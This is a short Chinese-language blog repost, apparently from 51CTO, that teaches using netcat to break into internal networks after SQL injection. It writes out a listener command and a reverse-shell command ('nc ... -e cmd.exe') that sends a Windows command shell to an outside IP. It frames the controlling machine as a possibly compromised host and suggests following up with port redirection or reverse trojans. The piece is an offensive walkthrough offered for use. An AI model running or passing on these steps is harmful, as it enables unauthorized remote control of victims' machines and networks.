nc命令小材大用

科技小能手發表於2017-11-12


nc命令小材大用

simeon
通過本文你可以學到:
1SQL注入內網滲透的一種思路
2nc命令的一種好用法
   內網滲透對於網路安全愛好者,特別是網路入侵檢測時無疑是一種疼,很多時候我們遇到這種情況只有採取放棄,其實不然,完全使用另外一種方法來進行突破。很多人多知道nc號稱瑞士軍刀,是一款非常不錯的網路安全工具,其強大的功能毫不遜於一款遠端控制軟體,只是我們沒有挖掘其強大的功能而已。本文只是探討如何來進行內網突破的思維。下面講講本文對nc的具體用法。
(一)在控制端監聽埠
這個控制端可以是自己的肉雞,可以是在具有獨立IP的網路計算機上,一定要具有獨立IP,否則無法反彈到該IP地址。使用命令如下:
Nc –vv –l –p port 例如 nc –vv –l –p 80
在控制端監聽埠時,需要注意的是,需要先使用“netstat -an”檢視網路埠的開放情況(圖1),選擇一個未監聽的埠,一般選擇804434461102523埠為好,當然其他未用埠也可以。
使用netstat –an 檢視埠開情況
說明:如果控制端已經開放了我們要監聽的埠,那麼我們使用nc監聽該埠不會成功,nc程式會提示錯誤資訊,如果監聽正常,會顯示“Listening on  [any] 80 …….”字樣(圖2)。
在控制端監聽80
(二)在內網計算機開放埠
      在內網計算機上執行“nc –vv ipaddress port –e cmd.exe”,這裡的IPaddress一定是控制端的ip地址,例如控制端的地址為“202.108.33.32,且80埠未開放,則在內網計算機上執行“nc –vv -202.108.33.32 80 –e cmd.exe”即可。如果一切正常,則會反彈一個dosshell回來,跟cmd命令的執行介面差不多,就象在本機的DOS下操作一樣,非常好用,可以貼上命令,直接執行命令等(圖3)。使用“net user”命令,可以看到我的賬號“simeon”在其中。
反彈shell成功
(三)其它運用
本文介紹的是如何使用nc來反彈內網的shell,在sql注入的過程中,很多時候遇到獨立主機是內網IP,及時主機開放了3389也無法連線進去,這個時候,一個真正的dosshell就特別重要,通過網頁執行nc命令,提供該內網一個shell,然後執行lcx埠重定向或者執行反彈木馬或者其他命令,無疑是一個很好的解決方法。
(四)結束語
    本文就技術難度來說,並不是很大,nc這個軟體很多朋友都熟悉,可以這麼說,搞網路安全的沒有不熟悉nc這個軟體的,但是對於nc命令的很多用法,不一定熟悉。想不起來曾經看過的一部電影,其中有這麼一段話,高手就是將一個複雜的動作做到單一和簡單!這跟真正的武林高手一樣,不一定需要太多招式,一刀一劍就可以致命取勝。網路安全也是如此,對一個工具要熟能生巧,舉一反三,才能出現更多的用法,更多的新的idea,期待大家新的發現。


 本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/38498


相關文章